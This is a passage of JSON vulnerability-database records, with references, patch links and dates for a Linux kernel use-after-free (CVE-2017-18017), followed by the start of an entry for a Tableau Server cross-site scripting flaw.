        "id": "147535",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147229",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147113",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147451",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147232",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-109097"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-18017"
      },
      {
        "db": "BID",
        "id": "102367"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011875"
      },
      {
        "db": "PACKETSTORM",
        "id": "147535"
      },
      {
        "db": "PACKETSTORM",
        "id": "147936"
      },
      {
        "db": "PACKETSTORM",
        "id": "147229"
      },
      {
        "db": "PACKETSTORM",
        "id": "147113"
      },
      {
        "db": "PACKETSTORM",
        "id": "147451"
      },
      {
        "db": "PACKETSTORM",
        "id": "147232"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-145"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-18017"
      }
    ]
  },
  "id": "VAR-201801-1708",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-109097"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T21:58:56.016000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ChangeLog-4.9.36",
        "trust": 0.8,
        "url": "https://www.kernel.org/pub/linux/kernel/v4.x/changelog-4.9.36"
      },
      {
        "title": "netfilter: xt_TCPMSS: add more sanity tests on tcph-\u003edoff",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/2638fd0f92d4397884fd991d8f4925cb3f081901"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "netfilter: xt_TCPMSS: add more sanity tests on tcph-\u003edoff",
        "trust": 0.8,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2638fd0f92d4397884fd991d8f4925cb3f081901"
      },
      {
        "title": "Linux kernel Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=77460"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20181737 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20181319 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20181170 - security advisory"
      },
      {
        "title": "IBM: IBM Security Bulletin: Multiple vulnerabilities in the Linux kernel affect IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=4762a13ce766481780ca81e6d0ac6aca"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20181130 - security advisory"
      },
      {
        "title": "IBM: IBM Security Bulletin: Multiple Vulnerabilities in the Linux kernel affect the IBM FlashSystem models V840 and V9000",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=7e9caa3ad3bc08db914510b615544169"
      },
      {
        "title": "Red Hat: CVE-2017-18017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2017-18017"
      },
      {
        "title": "Red Hat: Important: kernel-rt security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20180676 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20181062 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3583-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-trusty vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3583-2"
      },
      {
        "title": "Symantec Security Advisories: Linux Kernel Aug 2017 - Sep 2018 Vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=b3193a96468975c04eb9f136ca9abec4"
      },
      {
        "title": "Debian Security Advisories: DSA-4187-1 linux -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=c1e7a2b9a6a788d0d58529e52dc12cc3"
      },
      {
        "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities have been fixed in IBM Security Privileged Identity Manager Appliance.",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=f5bb2b180c7c77e5a02747a1f31830d9"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2018",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=ae57a14ec914f60b7203332a77613077"
      },
      {
        "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - July 2018",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=05b5bbd6fb289370b459faf1f4e3919d"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2017-18017 "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/darngcode/about-linux-azure "
      },
      {
        "title": "network-magic",
        "trust": 0.1,
        "url": "https://github.com/intrajp/network-magic "
      },
      {
        "title": "hiboma",
        "trust": 0.1,
        "url": "https://github.com/hiboma/hiboma "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2017-18017"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011875"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-145"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-416",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-109097"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011875"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-18017"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "http://patchwork.ozlabs.org/patch/746618/"
      },
      {
        "trust": 2.0,
        "url": "https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1739765"
      },
      {
        "trust": 2.0,
        "url": "https://github.com/torvalds/linux/commit/2638fd0f92d4397884fd991d8f4925cb3f081901"
      },
      {
        "trust": 2.0,
        "url": "https://lkml.org/lkml/2017/4/2/13"
      },
      {
        "trust": 2.0,
        "url": "https://www.kernel.org/pub/linux/kernel/v4.x/changelog-4.9.36"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2018:0676"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2018:1130"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2018:1170"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2018:1319"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2018:1737"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/102367"
      },
      {
        "trust": 1.7,
        "url": "https://help.ecostruxureit.com/display/public/uadce725/security+fixes+in+struxureware+data+center+expert+v7.6.0"
      },
      {
        "trust": 1.7,
        "url": "https://support.f5.com/csp/article/k18352029"
      },
      {
        "trust": 1.7,
        "url": "https://www.debian.org/security/2018/dsa-4187"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=2638fd0f92d4397884fd991d8f4925cb3f081901"
      },
      {
        "trust": 1.7,
        "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/4577-security-advisory-34"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2018/05/msg00000.html"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2018:1062"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-02/msg00008.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-02/msg00015.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-02/msg00038.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-02/msg00047.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-03/msg00030.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-03/msg00067.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-03/msg00070.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-03/msg00072.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-04/msg00014.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-02/msg00013.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.ubuntu.com/usn/usn-3583-1"
      },
      {
        "trust": 1.7,
        "url": "https://usn.ubuntu.com/3583-1/"
      },
      {
        "trust": 1.7,
        "url": "http://www.ubuntu.com/usn/usn-3583-2"
      },
      {
        "trust": 1.7,
        "url": "https://usn.ubuntu.com/3583-2/"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18017"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18017"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/docview.wss?uid=ibm10957179"
      },
      {
        "trust": 0.6,
        "url": "http://www.ibm.com/support/docview.wss"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2918/"
      },
      {
        "trust": 0.6,
        "url": "http://www.ibm.com/support/docview.wss?uid=ibm10879093"
      },
      {
        "trust": 0.6,
        "url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10957179"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/78218"
      },
      {
        "trust": 0.6,
        "url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10957177"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/76030"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2017-18017"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13166"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.5,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.5,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2017-8824"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2017-13166"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2017-1000410"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-8824"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-1000410"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2638fd0f92d4397884fd991d8f4925cb3f081901"
      },
      {
        "trust": 0.3,
        "url": "https://www.oracle.com/technetwork/topics/security/linuxbulletinapr2018-4431087.html"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15265"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2017-15265"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2017-17449"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17449"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-9725"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2017-9725"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2017-1000252"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-1000252"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18203"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000004"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-8897"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-7645"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7645"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/3431591"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-8897"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/vulnerabilities/ssbd"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-3639"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/3461451"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-3639"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-12154"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12154"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-17053"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14140"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-15129"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7913"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-6927"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-1000407"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-1000004"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-7913"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-15121"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-15126"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17053"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15116"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-17558"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-12190"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-3672"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-8633"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-18203"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-17448"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3672"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17448"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15126"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-14140"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17558"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-1000407"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15121"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-8633"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15129"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-15127"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-15116"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-5750"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-7294"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7294"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-15127"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12190"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.5_release_notes/index.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5803"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18241"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1066"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16911"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/linux"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-6927"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1068"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-9016"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5750"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18232"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5332"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-0861"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5333"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16914"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5753"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000199"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16526"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7492"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16913"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1092"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18216"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5715"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13220"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16912"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/3411331"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-109097"
      },
      {
        "db": "BID",
        "id": "102367"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011875"
      },
      {
        "db": "PACKETSTORM",
        "id": "147535"
      },
      {
        "db": "PACKETSTORM",
        "id": "147936"
      },
      {
        "db": "PACKETSTORM",
        "id": "147229"
      },
      {
        "db": "PACKETSTORM",
        "id": "147113"
      },
      {
        "db": "PACKETSTORM",
        "id": "147451"
      },
      {
        "db": "PACKETSTORM",
        "id": "147232"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-145"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-18017"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-109097"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-18017"
      },
      {
        "db": "BID",
        "id": "102367"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011875"
      },
      {
        "db": "PACKETSTORM",
        "id": "147535"
      },
      {
        "db": "PACKETSTORM",
        "id": "147936"
      },
      {
        "db": "PACKETSTORM",
        "id": "147229"
      },
      {
        "db": "PACKETSTORM",
        "id": "147113"
      },
      {
        "db": "PACKETSTORM",
        "id": "147451"
      },
      {
        "db": "PACKETSTORM",
        "id": "147232"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-145"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-18017"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-01-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-109097"
      },
      {
        "date": "2018-01-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-18017"
      },
      {
        "date": "2018-01-03T00:00:00",
        "db": "BID",
        "id": "102367"
      },
      {
        "date": "2018-02-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-011875"
      },
      {
        "date": "2018-05-08T20:33:37",
        "db": "PACKETSTORM",
        "id": "147535"
      },
      {
        "date": "2018-05-30T19:49:32",
        "db": "PACKETSTORM",
        "id": "147936"
      },
      {
        "date": "2018-04-18T20:02:50",
        "db": "PACKETSTORM",
        "id": "147229"
      },
      {
        "date": "2018-04-11T01:22:55",
        "db": "PACKETSTORM",
        "id": "147113"
      },
      {
        "date": "2018-05-03T01:31:56",
        "db": "PACKETSTORM",
        "id": "147451"
      },
      {
        "date": "2018-04-18T20:05:04",
        "db": "PACKETSTORM",
        "id": "147232"
      },
      {
        "date": "2018-01-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201801-145"
      },
      {
        "date": "2018-01-03T06:29:00.517000",
        "db": "NVD",
        "id": "CVE-2017-18017"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-01-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-109097"
      },
      {
        "date": "2023-01-19T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-18017"
      },
      {
        "date": "2018-05-02T12:00:00",
        "db": "BID",
        "id": "102367"
      },
      {
        "date": "2018-02-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-011875"
      },
      {
        "date": "2021-11-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201801-145"
      },
      {
        "date": "2024-04-24T13:40:09.260000",
        "db": "NVD",
        "id": "CVE-2017-18017"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-145"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel Uses freed memory vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011875"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-145"
      }
    ],
    "trust": 0.6
  }
}

var-201912-1402
Vulnerability from variot

Tableau Server 10.3 through 2019.4 on Windows and Linux allows XSS via the embeddedAuthRedirect page. Tableau Server Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. This product is mainly used to manage and share data visualizations, interactive dashboards, workbooks and reports created by Tableau Desktop data visualization software. The vulnerability stems from the lack of proper validation of client data by web applications. An attacker could use this vulnerability to execute client code

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201912-1402",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "server",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "tableau",
        "version": "10.3"
      },
      {
        "model": "server",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "tableau",
        "version": "2019.4"
      },
      {
        "model": "server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "tableau",
        "version": "2019.4 for up to  10.3"
      },
      {
        "model": "software tableau software server",
        "scope": "gte",
        "trust": 0.6,
        "vendor": "tableau",
        "version": "10.3,\u003c=2019.4"
      },
      {
        "model": "server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "tableau",
        "version": "2019.2.5"
      },
      {
        "model": "server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "tableau",
        "version": "2019.3"
      },
      {
        "model": "server",
